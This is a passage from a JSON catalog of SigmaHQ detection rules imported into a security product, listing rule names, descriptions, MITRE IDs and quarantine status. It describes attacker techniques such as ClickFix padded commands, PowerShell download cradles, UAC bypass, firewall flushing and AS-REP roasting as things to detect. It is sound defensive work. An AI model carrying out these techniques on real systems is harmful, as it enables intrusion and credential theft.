"provenance": { "source": "SigmaHQ/sigma", "source_id": "3abd6094-7027-475f-9630-8ab9be7b9725", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_net_use_mount_admin_share.yml" } }, { "id": "sigmahq-sigma-3ae1a046-f7db-439d-b7ce-b8b366b81fa6", "type": "detection", 
"name": "Disable Windows Security Center Notifications", "description": "Detect set UseActionCenterExperience to 0 to disable the Windows security center notification", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1112" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/disable-windows-security-center-notifications.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "3ae1a046-f7db-439d-b7ce-b8b366b81fa6", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_set/registry_set_disable_security_center_notifications.yml" } }, { "id": "sigmahq-sigma-3ae9974a-eb09-4044-8e70-8980a50c12c8", "type": "detection", "name": "Suspicious Explorer Process with Whitespace Padding - ClickFix/FileFix", "description": "Detects process creation with suspicious whitespace padding followed by a '#' character, which may indicate ClickFix or FileFix techniques used to conceal malicious commands from visual inspection.\nClickFix and FileFix are social engineering attack techniques where adversaries distribute phishing documents or malicious links that deceive users into opening the Windows Run dialog box or File Explorer search bar.\nThe victims are then instructed to paste commands from their clipboard, which contain extensive whitespace padding using various Unicode space characters to push the actual malicious command far to the right, effectively hiding it from immediate view.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", 
"mitre_techniques": [ "T1204.004", "T1027.010" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-explorer-process-with-whitespace-padding-clickfix-filefix.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "3ae9974a-eb09-4044-8e70-8980a50c12c8", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_susp_clickfix_filefix_whitespace_padding.yml" } }, { "id": "sigmahq-sigma-3aff0be0-7802-4a7e-a4fa-c60c74bc5e1d", "type": "detection", "name": "Lolbas OneDriveStandaloneUpdater.exe Proxy Download", "description": "Detects setting a custom URL for OneDriveStandaloneUpdater.exe to download a file from the Internet without executing any\nanomalous executables with suspicious arguments. 
The downloaded file will be in C:\\Users\\redacted\\AppData\\Local\\Microsoft\\OneDrive\\StandaloneUpdater\\PreSignInSettingsConfig.json", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1105" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/lolbas-onedrivestandaloneupdater-exe-proxy-download.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "3aff0be0-7802-4a7e-a4fa-c60c74bc5e1d", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_set/registry_set_lolbin_onedrivestandaloneupdater.yml" } }, { "id": "sigmahq-sigma-3b2c1059-ae5f-40b6-b5d4-6106d3ac20fe", "type": "detection", "name": "Hidden Flag Set On File/Directory Via Chflags - MacOS", "description": "Detects the execution of the \"chflags\" utility with the \"hidden\" flag, in order to hide files on macOS.\nWhen a file or directory has this hidden flag set, it becomes invisible to the default file listing commands and in graphical file browsers.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1218", "T1564.004", "T1552.001", "T1105" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/hidden-flag-set-on-file-directory-via-chflags-macos.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": 
"3b2c1059-ae5f-40b6-b5d4-6106d3ac20fe", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/macos/process_creation/proc_creation_macos_chflags_hidden_flag.yml" } }, { "id": "sigmahq-sigma-3b3c7f55-f771-4dd6-8a6e-08d057a17caf", "type": "detection", "name": "Arbitrary File Download Via MSPUB.EXE", "description": "Detects usage of \"MSPUB\" (Microsoft Publisher) to download arbitrary files", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1218" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/arbitrary-file-download-via-mspub-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "3b3c7f55-f771-4dd6-8a6e-08d057a17caf", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_mspub_download.yml" } }, { "id": "sigmahq-sigma-3b4b232a-af90-427c-a22f-30b0c0837b95", "type": "detection", "name": "CMSTP Execution Process Access", "description": "Detects various indicators of Microsoft Connection Manager Profile Installer execution", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "endpoint", "mitre_techniques": [ "T1218.003", "T1559.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": true, "path": "detections/sigma-imports/endpoint/cmstp-execution-process-access.yaml", "provenance": { "source": "SigmaHQ/sigma", "source_id": 
"3b4b232a-af90-427c-a22f-30b0c0837b95", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_access/proc_access_win_cmstp_execution_by_access.yml" } }, { "id": "sigmahq-sigma-3b4e950b-a3ea-44d3-877e-432071990709", "type": "detection", "name": "Notepad Password Files Discovery", "description": "Detects the execution of Notepad to open a file that has the string \"password\" which may indicate unauthorized access to credentials or suspicious activity.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1083" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/notepad-password-files-discovery.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "3b4e950b-a3ea-44d3-877e-432071990709", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_notepad_local_passwd_discovery.yml" } }, { "id": "sigmahq-sigma-3b5b0213-0460-4e3f-8937-3abf98ff7dcc", "type": "detection", "name": "Suspicious Workstation Locking via Rundll32", "description": "Detects a suspicious call to the user32.dll function that locks the user workstation", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": 
"detections/sigma-imports/_quarantine/suspicious-workstation-locking-via-rundll32.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "3b5b0213-0460-4e3f-8937-3abf98ff7dcc", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_rundll32_user32_dll.yml" } }, { "id": "sigmahq-sigma-3b5ba899-9842-4bc2-acc2-12308498bf42", "type": "detection", "name": "Office Application Initiated Network Connection Over Uncommon Ports", "description": "Detects an office suit application (Word, Excel, PowerPoint, Outlook) communicating to target systems over uncommon ports.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/office-application-initiated-network-connection-over-uncommon-ports.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "3b5ba899-9842-4bc2-acc2-12308498bf42", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/network_connection/net_connection_win_office_uncommon_ports.yml" } }, { "id": "sigmahq-sigma-3b6ab547-8ec2-4991-b9d2-2b06702a48d7", "type": "detection", "name": "PowerShell Download Pattern", "description": "Detects a Powershell process that contains download commands in its command line string", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": 
"medium", "category": "_quarantine", "mitre_techniques": [ "T1059.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/powershell-download-pattern.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "3b6ab547-8ec2-4991-b9d2-2b06702a48d7", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_powershell_download_patterns.yml" } }, { "id": "sigmahq-sigma-3b8f4c92-6a51-4d7e-9c3a-8e2d1f5a7b09", "type": "detection", "name": "Uncommon File Created by Notepad++ Updater Gup.EXE", "description": "Detects when the Notepad++ updater (gup.exe) creates files in suspicious or uncommon locations.\nThis could indicate potential exploitation of the updater component to deliver unwanted malware or unwarranted files.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1195.002", "T1557" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/uncommon-file-created-by-notepad-updater-gup-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "3b8f4c92-6a51-4d7e-9c3a-8e2d1f5a7b09", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/file/file_event/file_event_win_gup_uncommon_file_creation.yml" } }, { "id": 
"sigmahq-sigma-3bad990e-4848-4a78-9530-b427d854aac0", "type": "detection", "name": "Domain Trust Discovery Via Dsquery", "description": "Detects execution of \"dsquery.exe\" for domain trust discovery", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1482" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/domain-trust-discovery-via-dsquery.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "3bad990e-4848-4a78-9530-b427d854aac0", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_dsquery_domain_trust_discovery.yml" } }, { "id": "sigmahq-sigma-3be619f4-d9ec-4ea8-a173-18fdd01996ab", "type": "detection", "name": "Flush Iptables Ufw Chain", "description": "Detect use of iptables to flush all firewall rules, tables and chains and allow all network traffic", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1686" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/flush-iptables-ufw-chain.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "3be619f4-d9ec-4ea8-a173-18fdd01996ab", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": 
"rules/linux/process_creation/proc_creation_lnx_iptables_flush_ufw.yml" } }, { "id": "sigmahq-sigma-3bf1d859-3a7e-44cb-8809-a99e066d3478", "type": "detection", "name": "PowerShell Set-Acl On Windows Folder - PsScript", "description": "Detects PowerShell scripts to set the ACL to a file in the Windows folder", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1222" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/powershell-set-acl-on-windows-folder-psscript.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "3bf1d859-3a7e-44cb-8809-a99e066d3478", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/powershell/powershell_script/posh_ps_set_acl_susp_location.yml" } }, { "id": "sigmahq-sigma-3c05e90d-7eba-4324-9972-5d7f711a60a8", "type": "detection", "name": "UAC Bypass Tools Using ComputerDefaults", "description": "Detects tools such as UACMe used to bypass UAC with computerdefaults.exe (UACMe 59)", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1548.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/uac-bypass-tools-using-computerdefaults.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "3c05e90d-7eba-4324-9972-5d7f711a60a8", "source_commit": "df5c6a6", "license": "DRL-1.1", 
"license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_uac_bypass_computerdefaults.yml" } }, { "id": "sigmahq-sigma-3c1b5fb0-c72f-45ba-abd1-4d4c353144ab", "type": "detection", "name": "Process Creation Using Sysnative Folder", "description": "Detects process creation events that use the Sysnative folder (common for CobaltStrike spawns)", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1055" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/process-creation-using-sysnative-folder.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "3c1b5fb0-c72f-45ba-abd1-4d4c353144ab", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_susp_sysnative.yml" } }, { "id": "sigmahq-sigma-3c7d1587-3b13-439f-9941-7d14313dbdfe", "type": "detection", "name": "Potential COM Objects Download Cradles Usage - PS Script", "description": "Detects usage of COM objects that can be abused to download files in PowerShell by CLSID", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1105" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-com-objects-download-cradles-usage-ps-script.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC 
engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "3c7d1587-3b13-439f-9941-7d14313dbdfe", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/powershell/powershell_script/posh_ps_download_com_cradles.yml" } }, { "id": "sigmahq-sigma-3c89a1e8-0fba-449e-8f1b-8409d6267ec8", "type": "detection", "name": "Suspicious Process Created Via Wmic.EXE", "description": "Detects WMIC executing \"process call create\" with suspicious calls to processes such as \"rundll32\", \"regsrv32\", etc.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1047" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-process-created-via-wmic-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "3c89a1e8-0fba-449e-8f1b-8409d6267ec8", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_wmic_susp_process_creation.yml" } }, { "id": "sigmahq-sigma-3ce8e9a4-bc61-4c9b-8e69-d7e2492a8781", "type": "detection", "name": "OpenSSH Server Listening On Socket", "description": "Detects scenarios where an attacker enables the OpenSSH server and the server starts listening on the SSH socket.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1021.004" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": 
"detections/sigma-imports/_quarantine/openssh-server-listening-on-socket.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "3ce8e9a4-bc61-4c9b-8e69-d7e2492a8781", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/openssh/win_sshd_openssh_server_listening_on_socket.yml" } }, { "id": "sigmahq-sigma-3ceb2083-a27f-449a-be33-14ec1b7cc973", "type": "detection", "name": "Silence.EDA Detection", "description": "Detects Silence EmpireDNSAgent as described in the Group-IP report", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "critical", "category": "_quarantine", "mitre_techniques": [ "T1059.001", "T1071.004", "T1572", "T1529" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/silence-eda-detection.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "3ceb2083-a27f-449a-be33-14ec1b7cc973", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/powershell/powershell_script/posh_ps_apt_silence_eda.yml" } }, { "id": "sigmahq-sigma-3d0ed417-3d94-4963-a562-4a92c940656a", "type": "detection", "name": "Creation of a Diagcab", "description": "Detects the creation of diagcab file, which could be caused by some legitimate installer or is a sign of exploitation (review the filename and its location)", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", 
"mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/creation-of-a-diagcab.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "3d0ed417-3d94-4963-a562-4a92c940656a", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/file/file_event/file_event_win_susp_diagcab.yml" } }, { "id": "sigmahq-sigma-3d27f6dd-1c74-4687-b4fa-ca849d128d1c", "type": "detection", "name": "Office Application Startup - Office Test", "description": "Detects the addition of office test registry that allows a user to specify an arbitrary DLL that will be executed every time an Office application is started", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1137.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/office-application-startup-office-test.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "3d27f6dd-1c74-4687-b4fa-ca849d128d1c", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_event/registry_event_office_test_regadd.yml" } }, { "id": "sigmahq-sigma-3d2a2d59-929c-4b78-8c1a-145dfe9e07b1", "type": "detection", "name": "Publisher Attachment File Dropped In Suspicious Location", "description": "Detects creation of files with the \".pub\" 
extension in suspicious or uncommon locations. This could be a sign of attackers abusing Publisher documents", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/publisher-attachment-file-dropped-in-suspicious-location.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "3d2a2d59-929c-4b78-8c1a-145dfe9e07b1", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/file/file_event/file_event_win_office_publisher_files_in_susp_locations.yml" } }, { "id": "sigmahq-sigma-3d3aa6cd-6272-44d6-8afc-7e88dfef7061", "type": "detection", "name": "Change Default File Association Via Assoc", "description": "Detects file association changes using the builtin \"assoc\" command.\nWhen a file is opened, the default program used to open the file (also called the file association or handler) is checked. File association selections are stored in the Windows Registry and can be edited by users, administrators, or programs that have Registry access or by administrators using the built-in assoc utility. 
Applications can modify the file association for a given file extension to call an arbitrary program when a file with the given extension is opened.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1546.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/change-default-file-association-via-assoc.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "3d3aa6cd-6272-44d6-8afc-7e88dfef7061", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_cmd_assoc_execution.yml" } }, { "id": "sigmahq-sigma-3d48c9d3-1aa6-418d-98d3-8fd3c01a564e", "type": "detection", "name": "Potential Mftrace.EXE Abuse", "description": "Detects child processes of the \"Trace log generation tool for Media Foundation Tools\" (Mftrace.exe) which can be abused to execute arbitrary binaries.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1127" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-mftrace-exe-abuse.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "3d48c9d3-1aa6-418d-98d3-8fd3c01a564e", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": 
"rules/windows/process_creation/proc_creation_win_mftrace_child_process.yml" } }, { "id": "sigmahq-sigma-3d7679bd-0c00-440c-97b0-3f204273e6c7", "type": "detection", "name": "New Process Created Via Taskmgr.EXE", "description": "Detects the creation of a process via the Windows task manager. This might be an attempt to bypass UAC", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1036" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/new-process-created-via-taskmgr-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "3d7679bd-0c00-440c-97b0-3f204273e6c7", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_taskmgr_susp_child_process.yml" } }, { "id": "sigmahq-sigma-3da70954-0f2c-4103-adff-b7440368f50e", "type": "detection", "name": "Suspicious PROCEXP152.sys File Created In TMP", "description": "Detects the creation of the PROCEXP152.sys file in the application-data local temporary folder.\nThis driver is used by Sysinternals Process Explorer but also by KDU (https://github.com/hfiref0x/KDU) or Ghost-In-The-Logs (https://github.com/bats3c/Ghost-In-The-Logs), which uses KDU.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1685" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-procexp152-sys-file-created-in-tmp.yaml", "quarantine_reason": "imported rule; 
upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "3da70954-0f2c-4103-adff-b7440368f50e", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/file/file_event/file_event_win_susp_procexplorer_driver_created_in_tmp_folder.yml" } }, { "id": "sigmahq-sigma-3dfd06d2-eaf4-4532-9555-68aca59f57c4", "type": "detection", "name": "Process Execution From A Potentially Suspicious Folder", "description": "Detects a potentially suspicious execution from an uncommon folder.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1036" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/process-execution-from-a-potentially-suspicious-folder.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "3dfd06d2-eaf4-4532-9555-68aca59f57c4", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_susp_execution_path.yml" } }, { "id": "sigmahq-sigma-3e102cd9-a70d-4a7a-9508-403963092f31", "type": "detection", "name": "Linux Network Service Scanning Tools Execution", "description": "Detects execution of network scanning and reconnaissance tools. 
These tools can be used for the enumeration of local or remote network services for example.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1046" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/linux-network-service-scanning-tools-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "3e102cd9-a70d-4a7a-9508-403963092f31", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/linux/process_creation/proc_creation_lnx_susp_network_utilities_execution.yml" } }, { "id": "sigmahq-sigma-3e2f1b2c-4d5e-11ee-be56-0242ac120002", "type": "detection", "name": "Potential AS-REP Roasting via Kerberos TGT Requests", "description": "Detects suspicious Kerberos TGT requests with pre-authentication disabled (Pre-Authentication Type = 0) and Ticket Encryption Type (0x17) i.e, RC4-HMAC.\nThis may indicate an AS-REP Roasting attack, where attackers request AS-REP messages for accounts without pre-authentication and attempt to crack the encrypted ticket offline to recover user passwords.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": 